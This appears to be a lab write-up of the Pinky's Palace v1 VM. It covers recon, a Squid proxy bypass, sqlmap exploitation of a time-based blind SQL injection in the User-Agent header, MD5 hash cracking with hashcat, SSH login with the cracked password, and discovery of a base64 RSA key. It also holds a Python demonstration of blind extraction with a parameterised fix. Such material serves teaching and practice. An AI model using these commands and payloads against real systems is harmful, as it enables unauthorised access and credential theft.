Red team target practice: PINKY'S PALACE: V1

Information gathering

1. arp-scan
┌──(root㉿ru)-[~]
└─# arp-scan -l
Interface: eth0, type: EN10MB, MAC: 00:0c:29:69:c7:bf, IPv4: 192.168.169.36
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.169.63  08:00:27:07:a8:61       PCS Systemtechnik GmbH
192.168.169.131 3c:55:76:dc:ab:f5       CLOUD NETWORK TECHNOLOGY SINGAPORE PTE. LTD.
192.168.169.249 72:d4:e0:75:29:09       (Unknown: locally administered)

4 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 2.346 seconds (109.12 hosts/sec). 3 responded


2. netdiscover
netdiscover -r 192.168.169.0/24

 Currently scanning: Finished!   |   Screen View: Unique Hosts

 4 Captured ARP Req/Rep packets, from 3 hosts.   Total size: 240
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname
 -----------------------------------------------------------------------------
 192.168.169.63  08:00:27:07:a8:61      1      60  PCS Systemtechnik GmbH
 192.168.169.131 3c:55:76:dc:ab:f5      2     120  CLOUD NETWORK TECHNOLOGY SIN
 192.168.169.249 72:d4:e0:75:29:09      1      60  Unknown vendor


3. nmap
Host discovery

┌──(root㉿ru)-[~/kali]
└─# nmap -sn 192.168.169.0/24 --min-rate 10000
Starting Nmap 7.94SVN ( https://nmap.org ) at 2023-12-15 10:30 CST
Nmap scan report for 192.168.169.63
Host is up (0.00021s latency).
MAC Address: 08:00:27:07:A8:61 (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.169.131
Host is up (0.000092s latency).
MAC Address: 3C:55:76:DC:AB:F5 (Cloud Network Technology Singapore PTE.)
Nmap scan report for 192.168.169.249
Host is up (0.045s latency).
MAC Address: 72:D4:E0:75:29:09 (Unknown)
Nmap scan report for 192.168.169.36
Host is up.
Nmap done: 256 IP addresses (4 hosts up) scanned in 0.48 seconds


Port scan

┌──(root㉿ru)-[~/kali]
└─# nmap -p- 192.168.169.63 --min-rate 10000 -oA port
Starting Nmap 7.94SVN ( https://nmap.org ) at 2023-12-15 10:31 CST
Nmap scan report for 192.168.169.63
Host is up (0.0026s latency).
Not shown: 65532 closed tcp ports (reset)
PORT      STATE SERVICE
8080/tcp  open  http-proxy
31337/tcp open  Elite
64666/tcp open  unknown
MAC Address: 08:00:27:07:A8:61 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 4.26 seconds


Service and version detection

┌──(root㉿ru)-[~/kali]
└─# nmap -sC -sV -sT -O -A -p 8080,31337,64666 192.168.169.63 --min-rate 10000
Starting Nmap 7.94SVN ( https://nmap.org ) at 2023-12-15 10:32 CST
Nmap scan report for 192.168.169.63
Host is up (0.00027s latency).

PORT      STATE SERVICE    VERSION
8080/tcp  open  http       nginx 1.10.3
|_http-server-header: nginx/1.10.3
|_http-title: 403 Forbidden
31337/tcp open  http-proxy Squid http proxy 3.5.23
|_http-title: ERROR: The requested URL could not be retrieved
|_http-server-header: squid/3.5.23
64666/tcp open  ssh        OpenSSH 7.4p1 Debian 10+deb9u2 (protocol 2.0)
| ssh-hostkey:
|   2048 df:02:12:4f:4c:6d:50:27:6a:84:e9:0e:5b:65:bf:a0 (RSA)
|   256 0a:ad:aa:c7:16:f7:15:07:f0:a8:50:23:17:f3:1c:2e (ECDSA)
|_  256 4a:2d:e5:d8:ee:69:61:55:bb:db:af:29:4e:54:52:2f (ED25519)
MAC Address: 08:00:27:07:A8:61 (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   0.27 ms 192.168.169.63

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 27.80 seconds


8080   http        nginx 1.10.3
31337  http-proxy  Squid 3.5.23
64666  ssh         OpenSSH 7.4p1 (Debian 9)

Vulnerability scripts

┌──(root㉿ru)-[~/kali]
└─# nmap --script=vuln -p 8080,31337,64666 192.168.169.63 --min-rate 10000
Starting Nmap 7.94SVN ( https://nmap.org ) at 2023-12-15 10:34 CST
Nmap scan report for 192.168.169.63
Host is up (0.00035s latency).

PORT      STATE SERVICE
8080/tcp  open  http-proxy
31337/tcp open  Elite
64666/tcp open  unknown
MAC Address: 08:00:27:07:A8:61 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 73.08 seconds


4. nikto
┌──(root㉿ru)-[~/kali]
└─# nikto -h 192.168.169.63:8080
- Nikto v2.5.0
---------------------------------------------------------------------------
+ Target IP:          192.168.169.63
+ Target Hostname:    192.168.169.63
+ Target Port:        8080
+ Start Time:         2023-12-15 10:45:54 (GMT8)
---------------------------------------------------------------------------
+ Server: nginx/1.10.3
+ /: The anti-clickjacking X-Frame-Options header is not present. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options
+ /: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/
+ All CGI directories 'found', use '-C none' to test none
+ 26662 requests: 0 error(s) and 2 item(s) reported on remote host
+ End Time:           2023-12-15 10:46:38 (GMT8) (44 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested


WEB


Port 8080 serves a web site on nginx, but requesting it directly only returns 403 Forbidden. Port 31337 is an HTTP proxy (Squid), so the next thing to try is sending our requests through it: the proxy runs on the target itself, and a request routed through it to http://127.0.0.1:8080/ reaches nginx from localhost, which is evidently what the 403 rule permits. Set the browser to use 192.168.169.63:31337 as its proxy and open http://127.0.0.1:8080/ (the gobuster and dirsearch runs below do the same thing with --proxy).



Now the page loads.

Directory enumeration

1. gobuster
┌──(root㉿ru)-[/usr/share/dirbuster/wordlists]
└─# gobuster dir --proxy http://192.168.169.63:31337 -u http://127.0.0.1:8080 -w directory-list-lowercase-2.3-medium.txt
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://127.0.0.1:8080
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                directory-list-lowercase-2.3-medium.txt
[+] Negative Status codes:   404
[+] Proxy:                   http://192.168.169.63:31337
[+] User Agent:              gobuster/3.6
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/littlesecrets-main   (Status: 301) [Size: 185] [--> http://127.0.0.1:8080/littlesecrets-main/]
Progress: 207643 / 207644 (100.00%)
===============================================================
Finished
===============================================================


2. dirsearch
┌──(root㉿ru)-[~/kali]
└─# dirsearch --proxy 192.168.169.63:31337 -u "http://127.0.0.1:8080" -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
  from pkg_resources import DistributionNotFound, VersionConflict

  _|. _ _  _  _  _ _|_    v0.4.3
 (_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25
Wordlist size: 220545

Output File: /root/kali/reports/http_127.0.0.1_8080/_23-12-15_11-31-07.txt

Target: http://127.0.0.1:8080/

[11:31:07] Starting:
[11:34:51] 301 -  185B  - /littlesecrets-main  ->  http://127.0.0.1:8080/littlesecrets-main/
CTRL+C detected: Pausing threads, please wait...

Task Completed


Visiting /littlesecrets-main gives a login page.

The target only exposes three ports: 8080 (web), 31337 (proxy) and 64666 (SSH).

Directory brute-forcing turns up nothing but that login form, so the obvious thing to test is SQL injection on it: if it is injectable we can read the account table straight out of the database.

sqlmap

sqlmap with the proxy set, dumping the users table in one go:

sqlmap --proxy=http://192.168.169.63:31337 --dbms=mysql --data="user=adm&pass=passw&submit=Login" --url http://127.0.0.1:8080/littlesecrets-main/login.php --level=3 --risk=3 -T users --dump

(The table name goes in -T; the original command had `--dump users`, which sqlmap does not accept.) --level=3 matters here: sqlmap only tests the User-Agent header from level 3 upwards, and, as the runs below show, the injectable parameter is the User-Agent header rather than the form fields. The later runs reuse that finding from the stored session. Dumping everything at once is fine too; we only need the users table. Step by step:
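What sqlmap is doing under the hood, as an added example (not code from this write-up or from the target): a time-based blind extraction against a stand-in for the logging query. The page does not show login.php's source; the assumption here, consistent with sqlmap reporting the User-Agent header as the injection point and with a logs table sitting next to users, is that the header is spliced unescaped into an INSERT. The database is in-memory SQLite with a SLEEP() function registered to play MariaDB's, the sample rows are the ones sqlmap dumped, and build_db, vulnerable_log, safe_log, time_oracle and extract are names chosen for this example.

```python
"""Time-based blind SQL injection through a logged User-Agent header."""
import sqlite3
import time

SLEEP_SECS = 0.1            # delay asked for on a TRUE branch (sqlmap used 5 s, then 1 s)
THRESHOLD = SLEEP_SECS / 2  # a response slower than this means the condition held


def build_db() -> sqlite3.Connection:
    """In-memory stand-in for pinky_sec_db with the rows sqlmap dumped (constructed)."""
    db = sqlite3.connect(":memory:")
    # MariaDB has SLEEP() built in; SQLite needs it registered by hand.
    db.create_function("SLEEP", 1, lambda secs: time.sleep(secs) or 0)
    db.executescript("""
        CREATE TABLE users (uid INTEGER, user TEXT, pass TEXT);
        CREATE TABLE logs  (ip TEXT, user TEXT, ua TEXT);
        INSERT INTO users VALUES (1, 'pinkymanage', 'd60dffed7cc0d87e1f4a11aa06ca73af');
        INSERT INTO users VALUES (2, 'pinky',       'f543dbfeaf238729831a321c7a68bee4');
    """)
    return db


def vulnerable_log(db: sqlite3.Connection, user: str, user_agent: str) -> None:
    """Assumed shape of the bug: the header is spliced into the SQL as text."""
    db.execute(
        f"INSERT INTO logs (ip, user, ua) VALUES ('127.0.0.1', '{user}', '{user_agent}')"
    )


def safe_log(db: sqlite3.Connection, user: str, user_agent: str) -> None:
    """The fix: bound parameters, so the header is data and never SQL."""
    db.execute(
        "INSERT INTO logs (ip, user, ua) VALUES (?, ?, ?)", ("127.0.0.1", user, user_agent)
    )


def time_oracle(db: sqlite3.Connection, log_fn, condition: str) -> bool:
    """One 'request' whose only observable is its duration.

    The User-Agent closes the string literal, concatenates a CASE that calls
    SLEEP() only when `condition` holds, and reopens the literal so the INSERT
    still parses.  (|| is SQLite concatenation; MySQL would use CONCAT().
    sqlmap's real payload chained with AND instead, which MariaDB evaluates.)
    """
    ua = (f"Mozilla/5.0'||(SELECT CASE WHEN ({condition}) "
          f"THEN SLEEP({SLEEP_SECS}) ELSE 0 END)||'")
    t0 = time.perf_counter()
    log_fn(db, "adm", ua)
    return time.perf_counter() - t0 > THRESHOLD


def _bsearch(oracle, expr: str, lo: int, hi: int) -> int:
    """Pin down the integer value of `expr` in [lo, hi] with about log2 queries."""
    while lo < hi:
        mid = (lo + hi) // 2
        if oracle(f"{expr} > {mid}"):
            lo = mid + 1
        else:
            hi = mid
    return lo


def extract(db: sqlite3.Connection, log_fn, scalar_sql: str, max_len: int = 64) -> str:
    """Recover the string that `scalar_sql` returns, one character at a time."""
    oracle = lambda cond: time_oracle(db, log_fn, cond)
    length = _bsearch(oracle, f"length(({scalar_sql}))", 0, max_len)
    chars = []
    for i in range(1, length + 1):
        # unicode() is SQLite's ORD(); 32..126 covers printable ASCII
        chars.append(chr(_bsearch(oracle, f"unicode(substr(({scalar_sql}),{i},1))", 32, 126)))
    return "".join(chars)


if __name__ == "__main__":
    db = build_db()
    print(extract(db, vulnerable_log, "SELECT user FROM users WHERE uid=2"))  # pinky
    print(extract(db, safe_log, "SELECT user FROM users WHERE uid=2"))        # empty
```

Each character costs about seven timed requests, which is why sqlmap's dump of two 32-character hashes took minutes; against the parameterised insert the same payload is stored as a harmless string and the extraction finds a length of zero.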

1. Enumerate databases
┌──(root㉿ru)-[~/kali]
└─# sqlmap --proxy=http://192.168.169.63:31337 --dbms=mysql --data="user=adm&pass=passw&submit=Login" --url http://127.0.0.1:8080/littlesecrets-main/login.php --dbs
        ___
       __H__
 ___ ___["]_____ ___ ___  {1.7.11#stable}
|_ -| . [']     | .'| . |
|___|_  [.]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 12:03:22 /2023-12-15/

[12:03:22] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: User-Agent (User-Agent)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: sqlmap/1.7.11#stable (https://sqlmap.org)' AND (SELECT 9139 FROM (SELECT(SLEEP(5)))Cndh) AND 'Txbq'='Txbq
---
[12:03:22] [INFO] testing MySQL
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n] y
[12:03:29] [INFO] confirming MySQL
[12:03:29] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions

[12:03:39] [INFO] adjusting time delay to 1 second due to good response times
[12:03:39] [INFO] the back-end DBMS is MySQL
web application technology: Nginx 1.10.3
back-end DBMS: MySQL >= 5.0.0 (MariaDB fork)
[12:03:39] [INFO] fetching database names
[12:03:39] [INFO] fetching number of databases
[12:03:39] [INFO] retrieved: 2
[12:03:41] [INFO] retrieved: information_schema
[12:04:39] [INFO] retrieved: pinky_sec_db
available databases [2]:
[*] information_schema
[*] pinky_sec_db

[12:05:24] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/127.0.0.1'

[*] ending @ 12:05:24 /2023-12-15/


2. Enumerate tables
┌──(root㉿ru)-[~/kali]
└─# sqlmap --proxy=http://192.168.169.63:31337 --dbms=mysql --data="user=adm&pass=passw&submit=Login" --url http://127.0.0.1:8080/littlesecrets-main/login.php -D pinky_sec_db --tables
        ___
       __H__
 ___ ___[.]_____ ___ ___  {1.7.11#stable}
|_ -| . [(]     | .'| . |
|___|_  [(]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 12:07:01 /2023-12-15/

[12:07:01] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: User-Agent (User-Agent)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: sqlmap/1.7.11#stable (https://sqlmap.org)' AND (SELECT 9139 FROM (SELECT(SLEEP(5)))Cndh) AND 'Txbq'='Txbq
---
[12:07:01] [INFO] testing MySQL
[12:07:01] [INFO] confirming MySQL
[12:07:01] [INFO] the back-end DBMS is MySQL
web application technology: Nginx 1.10.3
back-end DBMS: MySQL >= 5.0.0 (MariaDB fork)
[12:07:01] [INFO] fetching tables for database: 'pinky_sec_db'
[12:07:01] [INFO] fetching number of tables for database 'pinky_sec_db'
[12:07:01] [INFO] resumed: 2
[12:07:01] [INFO] resumed: logs
[12:07:01] [INFO] resumed: users
Database: pinky_sec_db
[2 tables]
+-------+
| logs  |
| users |
+-------+

[12:07:01] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/127.0.0.1'

[*] ending @ 12:07:01 /2023-12-15/


3. Enumerate columns
┌──(root㉿ru)-[~/kali]
└─# sqlmap --proxy=http://192.168.169.63:31337 --dbms=mysql --data="user=adm&pass=passw&submit=Login" --url http://127.0.0.1:8080/littlesecrets-main/login.php -D pinky_sec_db -T users --columns
        ___
       __H__
 ___ ___[(]_____ ___ ___  {1.7.11#stable}
|_ -| . [']     | .'| . |
|___|_  [)]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 12:07:38 /2023-12-15/

[12:07:38] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: User-Agent (User-Agent)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: sqlmap/1.7.11#stable (https://sqlmap.org)' AND (SELECT 9139 FROM (SELECT(SLEEP(5)))Cndh) AND 'Txbq'='Txbq
---
[12:07:38] [INFO] testing MySQL
[12:07:38] [INFO] confirming MySQL
[12:07:38] [INFO] the back-end DBMS is MySQL
web application technology: Nginx 1.10.3
back-end DBMS: MySQL >= 5.0.0 (MariaDB fork)
[12:07:38] [INFO] fetching columns for table 'users' in database 'pinky_sec_db'
[12:07:38] [WARNING] time-based comparison requires larger statistical model, please wait.............................. (done)
[12:07:38] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n] y

[12:08:06] [INFO] adjusting time delay to 1 second due to good response times
3
[12:08:06] [INFO] retrieved: uid
[12:08:16] [INFO] retrieved: int(11)
[12:08:41] [INFO] retrieved: user
[12:08:53] [INFO] retrieved: varchar(100)
[12:09:27] [INFO] retrieved: pass
[12:09:40] [INFO] retrieved: varchar(100)
Database: pinky_sec_db
Table: users
[3 columns]
+--------+--------------+
| Column | Type         |
+--------+--------------+
| user   | varchar(100) |
| pass   | varchar(100) |
| uid    | int(11)      |
+--------+--------------+

[12:10:13] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/127.0.0.1'

[*] ending @ 12:10:13 /2023-12-15/


4. Dump the rows
┌──(root㉿ru)-[~/kali]
└─# sqlmap --proxy=http://192.168.169.63:31337 --dbms=mysql --data="user=adm&pass=passw&submit=Login" --url http://127.0.0.1:8080/littlesecrets-main/login.php -D pinky_sec_db -T users -C user,pass --dump
        ___
       __H__
 ___ ___[,]_____ ___ ___  {1.7.11#stable}
|_ -| . [,]     | .'| . |
|___|_  ["]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 12:11:06 /2023-12-15/

[12:11:06] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: User-Agent (User-Agent)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: sqlmap/1.7.11#stable (https://sqlmap.org)' AND (SELECT 9139 FROM (SELECT(SLEEP(5)))Cndh) AND 'Txbq'='Txbq
---
[12:11:06] [INFO] testing MySQL
[12:11:06] [INFO] confirming MySQL
[12:11:06] [INFO] the back-end DBMS is MySQL
web application technology: Nginx 1.10.3
back-end DBMS: MySQL >= 5.0.0 (MariaDB fork)
[12:11:06] [INFO] fetching entries of column(s) '`user`,pass' for table 'users' in database 'pinky_sec_db'
[12:11:06] [INFO] fetching number of column(s) '`user`,pass' entries for table 'users' in database 'pinky_sec_db'
[12:11:06] [WARNING] time-based comparison requires larger statistical model, please wait.............................. (done)
[12:11:07] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions

do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n]
2
[12:11:17] [WARNING] (case) time-based comparison requires reset of statistical model, please wait.............................. (done)
[12:11:22] [INFO] adjusting time delay to 1 second due to good response times
pinkymanage
[12:11:53] [INFO] retrieved: d60dffed7cc0d87e1f4a11aa06ca73af
[12:13:43] [INFO] retrieved: pinky
[12:14:01] [INFO] retrieved: f543dbfeaf238729831a321c7a68bee4

+-------------+----------------------------------+
| user        | pass                             |
+-------------+----------------------------------+
| pinkymanage | d60dffed7cc0d87e1f4a11aa06ca73af |
| pinky       | f543dbfeaf238729831a321c7a68bee4 |
+-------------+----------------------------------+


That gives us two accounts with password hashes. They are 32 hex characters, i.e. unsalted MD5, so a wordlist attack is the first thing to try:

pinkymanage   d60dffed7cc0d87e1f4a11aa06ca73af

pinky         f543dbfeaf238729831a321c7a68bee4

hashcat

┌──(root㉿ru)-[~/kali]
└─# hashcat -m 0 -a 0 d60dffed7cc0d87e1f4a11aa06ca73af /usr/share/wordlists/rockyou.txt
hashcat (v6.2.6) starting

OpenCL API (OpenCL 3.0 PoCL 4.0+debian  Linux, None+Asserts, RELOC, SPIR, LLVM 15.0.7, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
==================================================================================================================================================
* Device #1: cpu-haswell-AMD Ryzen 7 5800H with Radeon Graphics, 1422/2909 MB (512 MB allocatable), 2MCU

Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256

Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1

Optimizers applied:
* Zero-Byte
* Early-Skip
* Not-Salted
* Not-Iterated
* Single-Hash
* Single-Salt
* Raw-Hash

ATTENTION! Pure (unoptimized) backend kernels selected.
Pure kernels can crack longer passwords, but drastically reduce performance.
If you want to switch to optimized kernels, append -O to your commandline.
See the above message to find out about the exact limits.

Watchdog: Temperature abort trigger set to 90c

Host memory required for this attack: 0 MB

Dictionary cache hit:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344386
* Bytes.....: 139921530
* Keyspace..: 14344386

d60dffed7cc0d87e1f4a11aa06ca73af:3pinkysaf33pinkysaf3

Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 0 (MD5)
Hash.Target......: d60dffed7cc0d87e1f4a11aa06ca73af
Time.Started.....: Fri Dec 15 12:21:58 2023 (4 secs)
Time.Estimated...: Fri Dec 15 12:22:02 2023 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:  3047.4 kH/s (0.05ms) @ Accel:256 Loops:1 Thr:1 Vec:8
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 12463104/14344386 (86.88%)
Rejected.........: 0/12463104 (0.00%)
Restore.Point....: 12462592/14344386 (86.88%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#1....: 3r7gxjess -> 3pgzHh
Hardware.Mon.#1..: Util: 65%


One hash cracks; the other one does not.

pinkymanage   3pinkysaf33pinkysaf3

SSH login

┌──(root㉿ru)-[~/kali]
└─# ssh pinkymanage@192.168.169.63 -p 64666
The authenticity of host '[192.168.169.63]:64666 ([192.168.169.63]:64666)' can't be established.
ED25519 key fingerprint is SHA256:QUuapQBImuyyLZ2XEorKhwl3PUB551ZknLzOB7sXerY.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '[192.168.169.63]:64666' (ED25519) to the list of known hosts.
pinkymanage@192.168.169.63's password:
Linux pinkys-palace 4.9.0-4-amd64 #1 SMP Debian 4.9.65-3+deb9u1 (2017-12-23) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Fri Feb  2 04:00:51 2018 from 127.0.0.1
pinkymanage@pinkys-palace:~$ ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host
       valid_lft forever preferred_lft forever
2: enp0s3: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UNKNOWN group default qlen 1000
    link/ether 08:00:27:07:a8:61 brd ff:ff:ff:ff:ff:ff
    inet 192.168.169.63/24 brd 192.168.169.255 scope global enp0s3
       valid_lft forever preferred_lft forever
    inet6 240e:45a:8c85:4d7:a00:27ff:fe07:a861/64 scope global mngtmpaddr dynamic
       valid_lft 1935sec preferred_lft 1935sec
    inet6 fe80::a00:27ff:fe07:a861/64 scope link
       valid_lft forever preferred_lft forever
pinkymanage@pinkys-palace:~$


Privilege escalation

System enumeration
pinkymanage@pinkys-palace:/home$ uname -a
Linux pinkys-palace 4.9.0-4-amd64 #1 SMP Debian 4.9.65-3+deb9u1 (2017-12-23) x86_64 GNU/Linux
pinkymanage@pinkys-palace:/home$

pinkymanage@pinkys-palace:/home$ cd /var/www
pinkymanage@pinkys-palace:/var/www$ ls
html  pinkymanage
pinkymanage@pinkys-palace:/var/www$ cd pinkymanage/
pinkymanage@pinkys-palace:/var/www/pinkymanage$ ls
pinkymanage@pinkys-palace:/var/www/pinkymanage$ ls -al
total 16
drwx------ 3 pinkymanage pinkymanage 4096 Feb  2  2018 .
drwxr-xr-x 4 root        root        4096 Feb  2  2018 ..
-rw------- 1 pinkymanage pinkymanage  117 Feb  2  2018 .bash_history
drwx------ 2 pinkymanage pinkymanage 4096 Feb  2  2018 .ssh
pinkymanage@pinkys-palace:/var/www/pinkymanage$ cd .ssh
pinkymanage@pinkys-palace:/var/www/pinkymanage/.ssh$ ls
known_hosts
pinkymanage@pinkys-palace:/var/www/pinkymanage/.ssh$ cat known_hosts
|1|ddPO6l4PJ+hR883AkBxnqZwLqV0=|Dc3nHxLXil9FeR5kQ5KCU0+Ziug= ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBDZDIHslZJXVJH6dCHGaJRVy8WULZGgoqkKe8gfp/jibTQiMe8lIE8zFX2S8aXxWo4kSBd6i94zKj4YR2TcFj2o=
pinkymanage@pinkys-palace:/var/www/pinkymanage/.ssh$


pinkymanage@pinkys-palace:/var/www$ ls
html  pinkymanage
pinkymanage@pinkys-palace:/var/www$ cd html
pinkymanage@pinkys-palace:/var/www/html$ ls
index.html  littlesecrets-main
pinkymanage@pinkys-palace:/var/www/html$ ls -al
total 16
drwxr-xr-x 3 root root 4096 Feb  2  2018 .
drwxr-xr-x 4 root root 4096 Feb  2  2018 ..
-rw-r--r-- 1 root root  229 Feb  2  2018 index.html
drwxr-xr-x 3 root root 4096 Feb  2  2018 littlesecrets-main
pinkymanage@pinkys-palace:/var/www/html$ cd littlesecrets-main/
pinkymanage@pinkys-palace:/var/www/html/littlesecrets-main$ ls
index.html  login.php  logs.php  ultrasecretadminf1l35
pinkymanage@pinkys-palace:/var/www/html/littlesecrets-main$ cd ultrasecretadminf1l35/
pinkymanage@pinkys-palace:/var/www/html/littlesecrets-main/ultrasecretadminf1l35$ ls
note.txt
pinkymanage@pinkys-palace:/var/www/html/littlesecrets-main/ultrasecretadminf1l35$ cat note.txt
Hmm just in case I get locked out of my server I put this rsa key here.. Nobody will find it heh..

pinkymanage@pinkys-palace:/var/www/html/littlesecrets-main/ultrasecretadminf1l35$



pinkymanage@pinkys-palace:/var/www/html/littlesecrets-main/ultrasecretadminf1l35$ ls -al
total 16
drwxr-xr-x 2 root root 4096 Feb  2  2018 .
drwxr-xr-x 3 root root 4096 Feb  2  2018 ..
-rw-r--r-- 1 root root   99 Feb  2  2018 note.txt
-rw-r--r-- 1 root root 2270 Feb  2  2018 .ultrasecret
pinkymanage@pinkys-palace:/var/www/html/littlesecrets-main/ultrasecretadminf1l35$ cat .ultrasecret
LS0tLS1CRUdJTiBSU0EgUFJJVkFURSBLRVktLS0tLQpNSUlFcEFJQkFBS0NBUUVBMTZmeEwzLyto
L0lMVFpld2t2ZWtoSVExeWswb0xJK3kzTjRBSXRraGV6MTFJaGE4CkhjN0tPeC9MOWcyamQzSDhk
R1BVZktLcjlzZXF0Zzk3WktBOTVTL3NiNHczUXRsMUFCdS9wVktaQmJHR3NIRy8KeUl2R0VQS1Mr
QlNaNHN0TVc3SG54N2NpTXVod2Nad0xxWm1zeVN1bUVDVHVlUXN3TlBibElUbHJxb2xwWUY4eApl
NDdFbDlwSHdld05XY0lybXFyYXhDSDVUQzdVaGpnR2FRd21XM3FIeXJTcXAvaksvY3RiMVpwblB2
K0RDODMzCnUvVHlqbTZ6OFJhRFpHL2dSQklyTUduTmJnNHBaRmh0Z2JHVk9mN2ZlR3ZCRlI4QmlU
KzdWRmZPN3lFdnlCeDkKZ3hyeVN4dTJaMGFPTThRUjZNR2FETWpZVW5COWFUWXV3OEdQNHdJREFR
QUJBb0lCQUE2aUg3U0lhOTRQcDRLeApXMUx0cU9VeEQzRlZ3UGNkSFJidG5YYS80d3k0dzl6M1Mv
WjkxSzBrWURPbkEwT1VvWHZJVmwvS3JmNkYxK2lZCnJsZktvOGlNY3UreXhRRXRQa291bDllQS9r
OHJsNmNiWU5jYjNPbkRmQU9IYWxYQVU4TVpGRkF4OWdrY1NwejYKNkxPdWNOSUp1eS8zUVpOSEZo
TlIrWVJDb0RLbkZuRUlMeFlMNVd6MnFwdFdNWUR1d3RtR3pPOTY4WWJMck9WMQpva1dONmdNaUVp
NXFwckJoNWE4d0JSUVZhQnJMWVdnOFdlWGZXZmtHektveEtQRkt6aEk1ajQvRWt4TERKcXQzCkxB
N0pSeG1Gbjc3L21idmFEVzhXWlgwZk9jUzh1Z3lSQkVOMFZwZG5GNmtsNnRmT1hLR2owZ2QrZ0Fp
